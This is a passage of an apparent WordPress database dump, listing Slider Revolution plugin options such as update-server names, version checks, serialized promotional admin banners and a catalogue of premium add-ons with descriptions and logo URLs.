(786,'revslider_servers','a:3:{i:0;s:22:\"themepunch-ext-b.tools\";i:1;s:22:\"themepunch-ext-c.tools\";i:2;s:22:\"themepunch-ext-a.tools\";}','yes'),
(787,'revslider_server_refresh','1697505957','yes'),
(788,'revslider-update-check-short','1698022393','yes'),
(789,'revslider-connection','1','yes'),
(790,'revslider-update-hash','f3c0acfaecaf46d6e0ddef2650d0da86','yes'),
(791,'revslider-latest-version','6.6.17','yes'),
(792,'revslider-stable-version','4.2.0','yes'),
(793,'revslider-notices','a:6:{i:0;O:8:\"stdClass\":9:{s:7:\"version\";s:5:\"1.0.0\";s:4:\"text\";s:546:\"<div style=\"display: block; background: #fff;text-align: center; height: 250px;\"><a href=\"https://account.sliderrevolution.com/portal/pricing/?utm_source=admin&utm_medium=banner&utm_campaign=srusers&utm_content=getpremium\" target=\"_blank\" rel=\"noopener\"><video style=\"object-fit: cover; background-size: cover; opacity: 1; width: 960px; height: 250px; display: inline-block;\" muted=\"\" loop=\"\" autoplay=\"\" preload=\"auto\"><source src=\"https://sliderrevolution.com/wp-content/uploads/2021/07/adminpremiumvid4.mp4\" type=\"video/mp4\"></video></a></div>\";s:4:\"code\";s:12:\"TPRSV6511-01\";s:5:\"color\";s:5:\"green\";s:7:\"disable\";b:0;s:9:\"is_global\";b:0;s:4:\"type\";s:1:\"3\";s:10:\"show_until\";s:19:\"0000-00-00 00:00:00\";s:10:\"additional\";a:0:{}}i:1;O:8:\"stdClass\":9:{s:7:\"version\";s:5:\"1.9.9\";s:4:\"text\";s:562:\"<div style=\"display: block; background: #fff;text-align: center; \nheight: 300px;\"><a \nhref=\"https://www.sliderrevolution.com/slider-revolution-visual-editor-version-6-6/?utm_source=admin&utm_medium=banner&utm_campaign=srusers&utm_content=update66\"\n target=\"_blank\" rel=\"noopener\"><video style=\"object-fit: \ncover; background-size: cover; opacity: 1; width: 920px; height: 300px; \ndisplay: inline-block;\" muted loop autoplay \npreload=\"auto\"><source src=\"//updates.themepunch-ext-b.tools//banners/rs60/update66videobanner2.mp4\" type=\"video/mp4\"></video></a></div>\n\";s:4:\"code\";s:8:\"TPRSV663\";s:5:\"color\";s:5:\"green\";s:7:\"disable\";b:0;s:9:\"is_global\";b:0;s:4:\"type\";s:1:\"3\";s:10:\"show_until\";s:19:\"0000-00-00 00:00:00\";s:10:\"additional\";a:0:{}}i:2;O:8:\"stdClass\":9:{s:7:\"version\";s:5:\"1.0.0\";s:4:\"text\";s:537:\"<div style=\"display: block; background: #fff;text-align: center; height: 300px;\"><a href=\"https://account.sliderrevolution.com/portal/pricing/?utm_source=admin&utm_medium=banner&utm_campaign=srusers&utm_content=getpremium2\" target=\"_blank\" rel=\"noopener\"><video style=\"object-fit: cover; background-size: cover; opacity: 1; width: 920px; height: 300px; display: inline-block;\" muted=\"\" loop=\"\" autoplay=\"\" preload=\"auto\"><source src=\"//updates.themepunch-ext-b.tools//banners/videobanner_premium2.mp4\" type=\"video/mp4\"></video></a></div>\";s:4:\"code\";s:12:\"TPRSV6518-01\";s:5:\"color\";s:5:\"green\";s:7:\"disable\";b:0;s:9:\"is_global\";b:0;s:4:\"type\";s:1:\"3\";s:10:\"show_until\";s:19:\"0000-00-00 00:00:00\";s:10:\"additional\";a:0:{}}i:3;O:8:\"stdClass\":10:{s:7:\"version\";s:5:\"0.9.9\";s:4:\"text\";s:402:\"<div style=\"display: block; background:#fff;text-align: center; height: 250px;\"><a href=\"https://www.sliderrevolution.com/wordpress-hosting/?utm_source=admin&utm_medium=banner&utm_campaign=srusers&utm_content=getwphosting\" target=\"_blank\" rel=\"noopener\"><img style=\"width: 960px; height: 250px; display: inline-block;\"  src=\"//updates.themepunch-ext-b.tools//banners/rs60/wphostingadmin.jpg\"></a></div>\";s:4:\"code\";s:12:\"TPRSV6518-02\";s:5:\"color\";s:5:\"green\";s:7:\"disable\";b:0;s:9:\"is_global\";b:0;s:10:\"registered\";b:1;s:4:\"type\";s:1:\"3\";s:10:\"show_until\";s:19:\"0000-00-00 00:00:00\";s:10:\"additional\";a:0:{}}i:4;O:8:\"stdClass\":10:{s:7:\"version\";s:5:\"0.9.9\";s:4:\"text\";s:527:\"<div style=\"display: block; background: #0d0d0e;text-align: center; height: 504px;\"><a href=\"https://account.sliderrevolution.com/portal/pricing/?utm_source=admin&utm_medium=banner&utm_campaign=srusers&utm_content=getpremium3\" target=\"_blank\" rel=\"noopener\"><video style=\"object-fit: cover; background-size: cover; opacity: 1; width: 900px; height: 504px; display: inline-block;\" muted loop autoplay preload=\"auto\"><source src=\"//updates.themepunch-ext-b.tools//banners/rs60/buypremium3.mp4\" type=\"video/mp4\"></video></a></div>\";s:4:\"code\";s:8:\"TPRSV668\";s:5:\"color\";s:5:\"green\";s:7:\"disable\";b:0;s:9:\"is_global\";b:0;s:10:\"registered\";b:0;s:4:\"type\";s:1:\"3\";s:10:\"show_until\";s:19:\"0000-00-00 00:00:00\";s:10:\"additional\";a:0:{}}i:5;O:8:\"stdClass\":9:{s:7:\"version\";s:5:\"9.9.9\";s:4:\"text\";s:487:\"<div style=\"display: block; background:transparent;text-align: left; height: 250px;\"><a href=\"https://forms.gle/tQhQvrp5rZ1rQU7r7\" target=\"_blank\" rel=\"noopener\"><noscript><img decoding=\"async\" style=\"width: 960px; height: 250px; display: inline-block;\" src=\"//updates.themepunch-ext-b.tools//banners/surveybanner.jpg\"></noscript><img decoding=\"async\" style=\"width: 960px; height: 250px; display: inline-block;\" src=\"//updates.themepunch-ext-b.tools//banners/surveybanner.jpg\"></a></div>\";s:4:\"code\";s:10:\"TPRSV669-1\";s:5:\"color\";s:5:\"green\";s:7:\"disable\";b:0;s:9:\"is_global\";b:0;s:4:\"type\";s:1:\"3\";s:10:\"show_until\";s:19:\"0000-00-00 00:00:00\";s:10:\"additional\";a:0:{}}}','yes'),
(794,'revslider-additions','O:8:\"stdClass\":2:{s:9:\"templates\";O:8:\"stdClass\":3:{s:9:\"tutorials\";a:3:{i:0;O:8:\"stdClass\":2:{s:5:\"title\";s:19:\"Rapid Fire Overview\";s:3:\"url\";s:49:\"https://www.youtube.com/watch?v=LRNTFu-MFgw&t=25s\";}i:1;O:8:\"stdClass\":2:{s:5:\"title\";s:34:\"Responsiveness in Edited Templates\";s:3:\"url\";s:43:\"https://www.youtube.com/watch?v=hP4oV8SWgKY\";}i:2;O:8:\"stdClass\":2:{s:5:\"title\";s:16:\"Animation Basics\";s:3:\"url\";s:43:\"https://www.youtube.com/watch?v=nn3azizwpbs\";}}s:5:\"guide\";O:8:\"stdClass\":3:{s:5:\"title\";s:78:\"Require Expert Technical Advice?<br />Submit a Ticket for Dedicated 1on1 Help.\";s:3:\"url\";s:36:\"https://support.sliderrevolution.com\";s:3:\"img\";s:67:\"//updates.themepunch-ext-b.tools/banners/default_template_guide.jpg\";}s:6:\"bottom\";O:8:\"stdClass\":2:{s:5:\"title\";s:32:\"Load A Template From The Library\";s:3:\"img\";s:61:\"//updates.themepunch-ext-b.tools/banners/guide_mod_banner.png\";}}s:7:\"selling\";b:1;}','yes'),
(795,'rs-addons-counter','1','yes'),
(796,'revslider-addons','O:8:\"stdClass\":34:{s:28:\"revslider-particlewave-addon\";O:8:\"stdClass\":16:{s:2:\"id\";s:3:\"380\";s:9:\"releaseid\";s:2:\"29\";s:4:\"slug\";s:28:\"revslider-particlewave-addon\";s:12:\"version_from\";s:6:\"6.5.15\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:13:\"Particle Wave\";s:6:\"line_1\";s:36:\"Create 3D particle and polygon grids\";s:6:\"line_2\";s:40:\"with lots of style and animation options\";s:9:\"available\";s:5:\"1.1.5\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:0:\"\";s:4:\"sort\";s:1:\"9\";s:11:\"last_update\";s:10:\"2023-08-24\";s:6:\"global\";b:0;s:7:\"premium\";s:7:\"premium\";s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:79:\"//updates.themepunch-ext-b.tools/revslider/addons/images/addon_particlewave.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"PW\";}}s:25:\"revslider-particles-addon\";O:8:\"stdClass\":16:{s:2:\"id\";s:3:\"424\";s:9:\"releaseid\";s:1:\"7\";s:4:\"slug\";s:25:\"revslider-particles-addon\";s:12:\"version_from\";s:5:\"6.5.6\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:16:\"Particle Effects\";s:6:\"line_1\";s:17:\"Let\'s Parti(cle)!\";s:6:\"line_2\";s:51:\"Add interactive particle animations to your sliders\";s:9:\"available\";s:5:\"3.3.3\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:11:\"How to use?\";s:4:\"sort\";s:2:\"10\";s:11:\"last_update\";s:10:\"2023-07-28\";s:6:\"global\";b:0;s:7:\"premium\";s:7:\"premium\";s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:76:\"//updates.themepunch-ext-b.tools/revslider/addons/images/addon_particles.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"PT\";}}s:27:\"revslider-bubblemorph-addon\";O:8:\"stdClass\":16:{s:2:\"id\";s:3:\"405\";s:9:\"releaseid\";s:2:\"20\";s:4:\"slug\";s:27:\"revslider-bubblemorph-addon\";s:12:\"version_from\";s:5:\"6.5.1\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:11:\"BubbleMorph\";s:6:\"line_1\";s:26:\"Include BubbleMorph Layers\";s:6:\"line_2\";s:33:\"for a decorative lava lamp effect\";s:9:\"available\";s:5:\"3.0.8\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:6:\"How To\";s:4:\"sort\";s:2:\"20\";s:11:\"last_update\";s:10:\"2023-06-26\";s:6:\"global\";b:0;s:7:\"premium\";s:7:\"premium\";s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:78:\"//updates.themepunch-ext-b.tools/revslider/addons/images/addon_bubblemorph.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"BM\";}}s:26:\"revslider-thecluster-addon\";O:8:\"stdClass\":16:{s:2:\"id\";s:3:\"481\";s:9:\"releaseid\";s:2:\"28\";s:4:\"slug\";s:26:\"revslider-thecluster-addon\";s:12:\"version_from\";s:5:\"6.6.0\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:11:\"The Cluster\";s:6:\"line_1\";s:24:\"Cluster Particle Effects\";s:6:\"line_2\";s:27:\"with millions of Variations\";s:9:\"available\";s:6:\"1.0.10\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:0:\"\";s:4:\"sort\";s:2:\"22\";s:11:\"last_update\";s:10:\"2023-06-26\";s:6:\"global\";b:0;s:7:\"premium\";s:7:\"premium\";s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:74:\"//updates.themepunch-ext-b.tools/revslider/addons/images/addon_cluster.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"TC\";}}s:30:\"revslider-transitionpack-addon\";O:8:\"stdClass\":16:{s:2:\"id\";s:3:\"369\";s:9:\"releaseid\";s:2:\"28\";s:4:\"slug\";s:30:\"revslider-transitionpack-addon\";s:12:\"version_from\";s:5:\"6.5.6\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:20:\"Advanced Transitions\";s:6:\"line_1\";s:43:\"Add never-before-seen slide transitions to \";s:6:\"line_2\";s:42:\"Slider Revolution with the power of WEBGL.\";s:9:\"available\";s:5:\"1.0.6\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:0:\"\";s:4:\"sort\";s:2:\"30\";s:11:\"last_update\";s:10:\"2023-02-23\";s:6:\"global\";b:0;s:7:\"premium\";s:7:\"premium\";s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:77:\"//updates.themepunch-ext-b.tools/revslider/addons/images/addon_transition.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"AT\";}}s:27:\"revslider-beforeafter-addon\";O:8:\"stdClass\":16:{s:2:\"id\";s:3:\"507\";s:9:\"releaseid\";s:2:\"15\";s:4:\"slug\";s:27:\"revslider-beforeafter-addon\";s:12:\"version_from\";s:5:\"6.5.1\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:14:\"Before & After\";s:6:\"line_1\";s:35:\"Compare two slides before and after\";s:6:\"line_2\";s:33:\"use it vertically or horizontally\";s:9:\"available\";s:5:\"3.1.1\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:0:\"\";s:4:\"sort\";s:2:\"40\";s:11:\"last_update\";s:10:\"2023-05-20\";s:6:\"global\";b:0;s:7:\"premium\";s:7:\"premium\";s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:78:\"//updates.themepunch-ext-b.tools/revslider/addons/images/addon_beforeafter.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"BA\";}}s:26:\"revslider-typewriter-addon\";O:8:\"stdClass\":16:{s:2:\"id\";s:3:\"418\";s:9:\"releaseid\";s:1:\"3\";s:4:\"slug\";s:26:\"revslider-typewriter-addon\";s:12:\"version_from\";s:5:\"6.5.1\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:17:\"Typewriter Effect\";s:6:\"line_1\";s:27:\"Enhance your slider\'s text \";s:6:\"line_2\";s:24:\"with typewriter effects \";s:9:\"available\";s:5:\"3.0.6\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:9:\"Configure\";s:4:\"sort\";s:2:\"50\";s:11:\"last_update\";s:10:\"2023-01-09\";s:6:\"global\";b:0;s:7:\"premium\";s:7:\"premium\";s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:77:\"//updates.themepunch-ext-b.tools/revslider/addons/images/addon_typewriter.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"TW\";}}s:25:\"revslider-mousetrap-addon\";O:8:\"stdClass\":16:{s:2:\"id\";s:3:\"499\";s:9:\"releaseid\";s:2:\"24\";s:4:\"slug\";s:25:\"revslider-mousetrap-addon\";s:12:\"version_from\";s:5:\"6.6.0\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:9:\"Mousetrap\";s:6:\"line_1\";s:31:\"Create all kinds of interesting\";s:6:\"line_2\";s:19:\" mouse interactions\";s:9:\"available\";s:5:\"3.1.0\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:6:\"How To\";s:4:\"sort\";s:2:\"60\";s:11:\"last_update\";s:10:\"2023-10-06\";s:6:\"global\";b:0;s:7:\"premium\";s:7:\"premium\";s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:76:\"//updates.themepunch-ext-b.tools/revslider/addons/images/addon_mousetrap.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"MT\";}}s:28:\"revslider-liquideffect-addon\";O:8:\"stdClass\":16:{s:2:\"id\";s:3:\"500\";s:9:\"releaseid\";s:2:\"21\";s:4:\"slug\";s:28:\"revslider-liquideffect-addon\";s:12:\"version_from\";s:5:\"6.6.0\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:10:\"Distortion\";s:6:\"line_1\";s:22:\"Add Distortion Effects\";s:6:\"line_2\";s:30:\"to your slides and transitions\";s:9:\"available\";s:5:\"3.0.5\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:6:\"How To\";s:4:\"sort\";s:2:\"70\";s:11:\"last_update\";s:10:\"2023-01-09\";s:6:\"global\";b:0;s:7:\"premium\";s:7:\"premium\";s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:77:\"//updates.themepunch-ext-b.tools/revslider/addons/images/addon_distortion.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"LE\";}}s:22:\"revslider-lottie-addon\";O:8:\"stdClass\":16:{s:2:\"id\";s:3:\"420\";s:9:\"releaseid\";s:2:\"25\";s:4:\"slug\";s:22:\"revslider-lottie-addon\";s:12:\"version_from\";s:5:\"6.5.1\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:6:\"Lottie\";s:6:\"line_1\";s:53:\"Adds support for the popular Lottie Animation format,\";s:6:\"line_2\";s:70:\" including animation control, style customization and a local library.\";s:9:\"available\";s:5:\"3.1.2\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:6:\"How To\";s:4:\"sort\";s:2:\"80\";s:11:\"last_update\";s:10:\"2023-06-26\";s:6:\"global\";b:0;s:7:\"premium\";s:7:\"premium\";s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:73:\"//updates.themepunch-ext-b.tools/revslider/addons/images/addon_lottie.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"LT\";}}s:26:\"revslider-paintbrush-addon\";O:8:\"stdClass\":16:{s:2:\"id\";s:3:\"411\";s:9:\"releaseid\";s:2:\"23\";s:4:\"slug\";s:26:\"revslider-paintbrush-addon\";s:12:\"version_from\";s:5:\"6.5.1\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:10:\"Paintbrush\";s:6:\"line_1\";s:14:\"Paint or Erase\";s:6:\"line_2\";s:22:\"your background images\";s:9:\"available\";s:5:\"3.0.4\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:6:\"How To\";s:4:\"sort\";s:2:\"90\";s:11:\"last_update\";s:10:\"2023-08-09\";s:6:\"global\";b:0;s:7:\"premium\";s:7:\"premium\";s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:77:\"//updates.themepunch-ext-b.tools/revslider/addons/images/addon_paintbrush.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"PB\";}}s:22:\"revslider-charts-addon\";O:8:\"stdClass\":16:{s:2:\"id\";s:3:\"483\";s:9:\"releaseid\";s:2:\"27\";s:4:\"slug\";s:22:\"revslider-charts-addon\";s:12:\"version_from\";s:6:\"6.5.17\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:6:\"Charts\";s:6:\"line_1\";s:93:\"The Charts addon allows you to create visually impressive line or bar graphs from .csv data, \";s:6:\"line_2\";s:56:\"with tons of options to take full control of the design.\";s:9:\"available\";s:5:\"3.0.5\";s:10:\"background\";s:73:\"//updates.themepunch-ext-b.tools/revslider/addons/images/addon_charts.png\";s:6:\"button\";s:0:\"\";s:4:\"sort\";s:3:\"100\";s:11:\"last_update\";s:10:\"2022-08-04\";s:6:\"global\";b:0;s:7:\"premium\";s:7:\"premium\";s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:73:\"//updates.themepunch-ext-b.tools/revslider/addons/images/addon_charts.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"CH\";}}s:22:\"revslider-slicey-addon\";O:8:\"stdClass\":16:{s:2:\"id\";s:3:\"417\";s:9:\"releaseid\";s:2:\"13\";s:4:\"slug\";s:22:\"revslider-slicey-addon\";s:12:\"version_from\";s:5:\"6.5.1\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:6:\"Slicey\";s:6:\"line_1\";s:20:\"Slice \'em up nicely!\";s:6:\"line_2\";s:38:\"Create image slices of your background\";s:9:\"available\";s:5:\"3.0.4\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:6:\"How To\";s:4:\"sort\";s:3:\"110\";s:11:\"last_update\";s:10:\"2023-01-09\";s:6:\"global\";b:0;s:7:\"premium\";s:7:\"premium\";s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:73:\"//updates.themepunch-ext-b.tools/revslider/addons/images/addon_slicey.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"SL\";}}s:25:\"revslider-filmstrip-addon\";O:8:\"stdClass\":16:{s:2:\"id\";s:3:\"422\";s:9:\"releaseid\";s:2:\"10\";s:4:\"slug\";s:25:\"revslider-filmstrip-addon\";s:12:\"version_from\";s:5:\"6.5.6\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:9:\"Filmstrip\";s:6:\"line_1\";s:44:\"Display a continously rotating set of images\";s:6:\"line_2\";s:26:\"for your slide backgrounds\";s:9:\"available\";s:5:\"3.0.6\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:6:\"How To\";s:4:\"sort\";s:3:\"125\";s:11:\"last_update\";s:10:\"2023-01-09\";s:6:\"global\";b:0;s:7:\"premium\";s:7:\"premium\";s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:76:\"//updates.themepunch-ext-b.tools/revslider/addons/images/addon_filmstrip.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"FS\";}}s:27:\"revslider-maintenance-addon\";O:8:\"stdClass\":16:{s:2:\"id\";s:3:\"421\";s:9:\"releaseid\";s:1:\"4\";s:4:\"slug\";s:27:\"revslider-maintenance-addon\";s:12:\"version_from\";s:5:\"6.5.0\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:15:\"Coming & Maint.\";s:6:\"line_1\";s:37:\"Simple Coming Soon & Maintenance Page\";s:6:\"line_2\";s:42:\"Let your visitors know what\'s up and when!\";s:9:\"available\";s:5:\"3.0.0\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:9:\"Configure\";s:4:\"sort\";s:3:\"127\";s:11:\"last_update\";s:10:\"2023-07-17\";s:6:\"global\";b:1;s:7:\"premium\";s:7:\"premium\";s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:84:\"//updates.themepunch-ext-b.tools/revslider/addons/images/addon_underconstruction.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"MT\";}}s:24:\"revslider-revealer-addon\";O:8:\"stdClass\":16:{s:2:\"id\";s:3:\"416\";s:9:\"releaseid\";s:2:\"19\";s:4:\"slug\";s:24:\"revslider-revealer-addon\";s:12:\"version_from\";s:5:\"6.5.1\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:6:\"Reveal\";s:6:\"line_1\";s:9:\"Reveal...\";s:6:\"line_2\";s:37:\"...your inner beast... and RevSliders\";s:9:\"available\";s:5:\"3.0.3\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:6:\"How To\";s:4:\"sort\";s:3:\"130\";s:11:\"last_update\";s:10:\"2023-01-09\";s:6:\"global\";b:0;s:7:\"premium\";s:7:\"premium\";s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:73:\"//updates.themepunch-ext-b.tools/revslider/addons/images/addon_reveal.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"RV\";}}s:24:\"revslider-panorama-addon\";O:8:\"stdClass\":16:{s:2:\"id\";s:3:\"423\";s:9:\"releaseid\";s:2:\"17\";s:4:\"slug\";s:24:\"revslider-panorama-addon\";s:12:\"version_from\";s:5:\"6.5.6\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:8:\"Panorama\";s:6:\"line_1\";s:14:\"Panorama AddOn\";s:6:\"line_2\";s:28:\"Display images in 360 degree\";s:9:\"available\";s:5:\"3.0.9\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:6:\"How To\";s:4:\"sort\";s:3:\"135\";s:11:\"last_update\";s:10:\"2023-01-09\";s:6:\"global\";b:0;s:7:\"premium\";s:7:\"premium\";s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:75:\"//updates.themepunch-ext-b.tools/revslider/addons/images/addon_panorama.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"PN\";}}s:27:\"revslider-scrollvideo-addon\";O:8:\"stdClass\":16:{s:2:\"id\";s:3:\"498\";s:9:\"releaseid\";s:2:\"26\";s:4:\"slug\";s:27:\"revslider-scrollvideo-addon\";s:12:\"version_from\";s:5:\"6.6.0\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:12:\"Scroll Video\";s:6:\"line_1\";s:114:\"This addon allows you to generate a sequence of images from any html5 video and play them with scroll interaction.\";s:6:\"line_2\";s:49:\"Quality options are included for optimal results!\";s:9:\"available\";s:5:\"3.0.4\";s:10:\"background\";s:78:\"//updates.themepunch-ext-b.tools/revslider/addons/images/addon_scrollvideo.jpg\";s:6:\"button\";s:6:\"How To\";s:4:\"sort\";s:3:\"140\";s:11:\"last_update\";s:10:\"2023-01-09\";s:6:\"global\";b:0;s:7:\"premium\";s:7:\"premium\";s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:78:\"//updates.themepunch-ext-b.tools/revslider/addons/images/addon_scrollvideo.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"SV\";}}s:31:\"revslider-explodinglayers-addon\";O:8:\"stdClass\":16:{s:2:\"id\";s:3:\"407\";s:9:\"releaseid\";s:2:\"22\";s:4:\"slug\";s:31:\"revslider-explodinglayers-addon\";s:12:\"version_from\";s:5:\"6.5.1\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:16:\"Exploding Layers\";s:6:\"line_1\";s:23:\"Add explosive particles\";s:6:\"line_2\";s:24:\"to your layers animation\";s:9:\"available\";s:5:\"3.0.5\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:6:\"How To\";s:4:\"sort\";s:3:\"150\";s:11:\"last_update\";s:10:\"2023-01-09\";s:6:\"global\";b:0;s:7:\"premium\";s:7:\"premium\";s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:76:\"//updates.themepunch-ext-b.tools/revslider/addons/images/addon_exploding.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"EL\";}}s:23:\"revslider-sharing-addon\";O:8:\"stdClass\":16:{s:2:\"id\";s:3:\"397\";s:9:\"releaseid\";s:1:\"5\";s:4:\"slug\";s:23:\"revslider-sharing-addon\";s:12:\"version_from\";s:5:\"6.5.0\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:14:\"Social Sharing\";s:6:\"line_1\";s:17:\"Share your slides\";s:6:\"line_2\";s:50:\"with RevSlider \"actions\" because sharing is caring\";s:9:\"available\";s:5:\"3.0.1\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:11:\"How to use?\";s:4:\"sort\";s:3:\"165\";s:11:\"last_update\";s:10:\"2023-07-08\";s:6:\"global\";b:1;s:7:\"premium\";s:7:\"premium\";s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:80:\"//updates.themepunch-ext-b.tools/revslider/addons/images/addon_socialsharing.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"SH\";}}s:26:\"revslider-whiteboard-addon\";O:8:\"stdClass\":16:{s:2:\"id\";s:3:\"419\";s:9:\"releaseid\";s:1:\"1\";s:4:\"slug\";s:26:\"revslider-whiteboard-addon\";s:12:\"version_from\";s:5:\"6.5.1\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:10:\"Whiteboard\";s:6:\"line_1\";s:31:\"Create Hand-Drawn Presentations\";s:6:\"line_2\";s:45:\"that are understandable, memorable & engaging\";s:9:\"available\";s:5:\"3.0.5\";s:10:\"background\";s:81:\"//updates.themepunch-ext-b.tools/revslider/addons/images/whiteboard_widget_bg.jpg\";s:6:\"button\";s:11:\"How to use?\";s:4:\"sort\";s:3:\"170\";s:11:\"last_update\";s:10:\"2023-01-09\";s:6:\"global\";b:0;s:7:\"premium\";s:7:\"premium\";s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:77:\"//updates.themepunch-ext-b.tools/revslider/addons/images/addon_whiteboard.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"WB\";}}s:24:\"revslider-polyfold-addon\";O:8:\"stdClass\":16:{s:2:\"id\";s:3:\"414\";s:9:\"releaseid\";s:2:\"14\";s:4:\"slug\";s:24:\"revslider-polyfold-addon\";s:12:\"version_from\";s:5:\"6.5.1\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:22:\"Polyfold Scroll Effect\";s:6:\"line_1\";s:32:\"Add sharp edges to your sliders \";s:6:\"line_2\";s:35:\"as they scroll into and out of view\";s:9:\"available\";s:5:\"3.0.6\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:11:\"How to use?\";s:4:\"sort\";s:3:\"180\";s:11:\"last_update\";s:10:\"2023-01-09\";s:6:\"global\";b:0;s:7:\"premium\";s:7:\"premium\";s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:75:\"//updates.themepunch-ext-b.tools/revslider/addons/images/addon_polyfold.jpg\";s:5:\"color\";s:7:\"#3e186f\";s:4:\"text\";s:2:\"PF\";}}s:29:\"revslider-domain-switch-addon\";O:8:\"stdClass\":16:{s:2:\"id\";s:2:\"78\";s:9:\"releaseid\";s:2:\"11\";s:4:\"slug\";s:29:\"revslider-domain-switch-addon\";s:12:\"version_from\";s:5:\"6.0.0\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:13:\"Domain Switch\";s:6:\"line_1\";s:17:\"Switch Image URLs\";s:6:\"line_2\";s:37:\"in sliders from one domain to another\";s:9:\"available\";s:5:\"1.0.1\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:11:\"How to 